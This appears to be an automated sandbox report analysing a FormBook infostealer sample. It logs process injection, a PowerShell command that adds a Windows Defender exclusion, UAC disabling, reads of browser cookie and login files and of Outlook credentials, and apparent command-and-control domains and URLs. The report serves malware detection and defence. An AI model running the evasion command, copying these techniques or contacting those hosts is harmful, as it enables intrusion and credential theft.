            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\System32\notepad.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 7956Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\System32\notepad.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\System32\notepad.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4F36008Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092455315.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000000.1773732899.0000000001190000.00000002.00000001.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092556759.0000000001900000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeQueries volume information: C:\Users\user\Desktop\NdYuOgHbM9.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disables UAC (registry)
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		612
            Process Injection            		21
            Disable or Modify Tools            		1
            OS Credential Dumping            		131
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		612
            Process Injection            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438237 Sample: NdYuOgHbM9.exe Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 44 www.selectif.xyz 2->44 46 www.yekobie.com 2->46 48 18 other IPs or domains 2->48 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected FormBook 2->56 60 4 other signatures 2->60 10 NdYuOgHbM9.exe 1 4 2->10         started        signatures3 58 Performs DNS queries to domains with low reputation 44->58 process4 signatures5 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Allocates memory in foreign processes 10->68 70 3 other signatures 10->70 13 ngen.exe 10->13         started        16 powershell.exe 23 10->16         started        18 WerFault.exe 19 16 10->18         started        20 3 other processes 10->20 process6 signatures7 72 Maps a DLL or memory area into another process 13->72 22 tyVvDSdgzXcAfzWUYqtqOHNMkF.exe 13->22 injected 74 Loading BitLocker PowerShell Module 16->74 25 WmiPrvSE.exe 16->25         started        27 conhost.exe 16->27         started        process8 signatures9 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 29 sfc.exe 13 22->29         started        process10 signatures11 76 Tries to steal Mail credentials (via file / registry access) 29->76 78 Tries to harvest and steal browser information (history, passwords, etc) 29->78 80 Modifies the context of a thread in another process (thread injection) 29->80 82 2 other signatures 29->82 32 tyVvDSdgzXcAfzWUYqtqOHNMkF.exe 29->32 injected 36 firefox.exe 29->36         started        process12 dnsIp13 38 www.selectif.xyz 203.161.46.103, 49760, 49761, 49762 VNPT-AS-VNVNPTCorpVN Malaysia 32->38 40 www.xn--yzyp76d.com 47.76.62.167, 49772, 49773, 49774 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 32->40 42 12 other IPs or domains 32->42 50 Found direct / indirect Syscall (likely to bypass EDR) 32->50 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            NdYuOgHbM9.exe42%ReversingLabsByteCode-MSIL.Trojan.Leonem
            NdYuOgHbM9.exe40%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.selectif.xyz1%VirustotalBrowse
            www.rltattoo.com0%VirustotalBrowse
            yekobie.com0%VirustotalBrowse
            www.auetravel.kz0%VirustotalBrowse
            glissy.ca0%VirustotalBrowse
            insertcoen.com1%VirustotalBrowse
            fivetownsjcc.com0%VirustotalBrowse
            www.getgoodscrub.com3%VirustotalBrowse
            www.btpbox.com1%VirustotalBrowse
            www.xn--yzyp76d.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.btpbox.com/wu8v/0%Avira URL Cloudsafe
            http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yO0%Avira URL Cloudsafe
            http://www.afilias.info/0%Avira URL Cloudsafe
            http://www.xn--yzyp76d.com/wu8v/?MdtlcTm=1Nt7DtzRhGe3jz/JXOJL2dnBH6uFnvwsc8PmoPLhBuJURU+BFCU8Z1cZNkrKfh5y7OIVqmEx6Y55MHCBN9ekEPrBm2pelHdYOjg1gnpKSYR8wHJ7U/KLji4=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            https://mail.365.com/login.html0%Avira URL Cloudsafe
            http://www.btpbox.com/wu8v/?MdtlcTm=HNLEVoSmZQxFSmctMpTTd4dyTFjeIBcvYbInUpVYO5VLbn2V1MEgIHD38EU48JsuuCIVw/TFvn9kkkg/Sq9Xy2f3I5Wlm16rLCQIpVyEpLVAPUkeiuBH2KE=&_X=ClAdyH4P7rA8z0%Avira URL Cloudsafe
            https://www.marksmile.com/0%Avira URL Cloudsafe
            http://www.rltattoo.com/wu8v/0%Avira URL Cloudsafe
            http://www.glissy.ca/wu8v/0%Avira URL Cloudsafe
